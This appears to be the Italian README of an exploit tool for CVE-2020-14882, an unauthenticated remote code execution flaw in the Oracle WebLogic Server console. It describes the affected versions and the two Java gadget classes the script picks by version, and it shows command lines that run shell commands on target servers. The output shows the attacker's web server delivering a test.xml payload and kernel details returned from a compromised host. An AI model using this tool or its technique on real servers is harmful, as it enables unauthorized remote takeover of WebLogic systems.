
CVE-2020-14882
CVE-2020-14882
Vulnerabilità nel prodotto Oracle WebLogic Server di Oracle Fusion Middleware (componente: Console). Le versioni supportate interessate sono 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 e 14.1.1.0.0. Una vulnerabilità facilmente sfruttabile consente a un attaccante non autenticato con accesso alla rete tramite HTTP di compromettere Oracle WebLogic Server. Attacchi riusciti di questa vulnerabilità possono portare al controllo di Oracle WebLogic
Per le versioni di Oracle WebLogic precedenti alla 12.2.1, è necessario usare la classe 'com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' poiché la classe 'com.tangosol.coherence.mvel2.sh.ShellSession' non è disponibile. Lo script passa automaticamente da una classe all'altra per l'esecuzione dei comandi a seconda delle versioni rilevate.
Alcuni degli script attuali su Github per lo sfruttamento di CVE-2020-14882 supportano solo la classe 'com.tangosol.coherence.mvel2.sh.ShellSession', il che significa che gli script falliranno sulle versioni WebLogic 10.3.6.0.0 e 12.1.3.0.0.
% python3 CVE-2020-14882.py -u http://172.16.164.134:7001 -c 'uname -r > /tmp/success' -i 172.16.164.1
[*] http://172.16.164.134:7001/console/login/LoginForm.jsp [version 12.1.3.0.0]
[*] Using: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
% python3 CVE-2020-14882.py -u http://127.0.0.1:7001 -c 'uname -r' -i 172.16.164.1
http://127.0.0.1:7001/console/login/LoginForm.jsp
[*] http://127.0.0.1:7001/console/login/LoginForm.jsp [version 12.2.1.3.0]
[*] Using: com.tangosol.coherence.mvel2.sh.ShellSession
Linux 96fc5d43736b 4.19.121-linuxkit #1 SMP Tue Dec 1 17:50:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux